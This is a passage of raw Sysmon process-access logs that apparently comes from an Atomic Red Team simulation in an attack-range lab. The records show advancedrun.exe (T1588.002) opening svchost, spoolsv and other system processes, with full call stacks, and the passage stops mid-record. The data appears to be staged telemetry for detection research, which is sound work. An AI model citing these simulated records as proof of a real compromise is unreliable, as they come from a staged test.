17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983952Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983951Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983950Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983949Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983948Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983947Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983946Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983945Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983944Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983943Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983942Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.